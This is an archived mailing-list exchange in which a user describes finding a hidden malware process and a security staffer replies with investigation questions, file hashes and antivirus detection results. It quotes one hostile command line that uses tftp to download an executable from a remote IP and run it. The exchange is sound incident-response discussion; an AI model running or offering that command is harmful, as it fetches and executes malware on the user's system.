Craig Lalley wrote:
> I generally keep a good eye on my computer.
>
> Today I noticed that network packets were leaving my PC, without my understanding why.
>
> I turned off all processes, that could be communicating.  I even looked at my Mcafee firewall, but nothing was identified.
>
> My task manager showed no processes that were unknown.
>
> I found this in my run commands drop down box.
> %comspec% /c tftp -i 66.36.241.146 GET pke.exe & start pke
>
> So, I downloaded process explorer from www.sysinternals.com.    
>
> And low and behold there was a hidden process pke, consuming 49% of the CPU (think hyperthreading).  I was able to kill it, and find the offending program and remove it.
>
> Has anyone seen anything like this before?
All the time, being a security person at a university.  Question would
be, how did it get there.  Are you patched?  Did you get the timestamps
of the file before you deleted it?  Recall what you were doing at the time?

The IP belongs to HopOne, which is "a really bad neighborhood".  The
file itself:

File size: 18964 bytes
MD5: 8e6f28e1257d7dc0aa94b7b69a8721ca
SHA1: cbfa37aeb293fbbe082b86f0b4c83f3c38f53436
packers: ASPACK

Antivirus    Version    Update    Result
AntiVir    7.3.0.15    12.14.2006    HEUR/Malware
BitDefender    7.2    12.15.2006    Generic.Malware.SYdld.228593FE
DrWeb    4.33    12.14.2006    BACKDOOR.Trojan
eSafe    7.0.14.0    12.14.2006    suspicious Trojan/Worm
Fortinet    2.82.0.0    12.15.2006    suspicious
Ikarus    T3.1.0.26    12.14.2006    Trojan-Spy.Win32.Delf.OR
NOD32v2    1922    12.14.2006    probably unknown NewHeur_PE virus

Not sure what it is, but it's not nice.  Will look into this one a bit,
haven't seen it before and it's not very well known based on the few
hits above.

Jeff

* To join/leave the list, search archives, change list settings, *
* etc., please visit http://raven.utc.edu/archives/hp3000-l.html *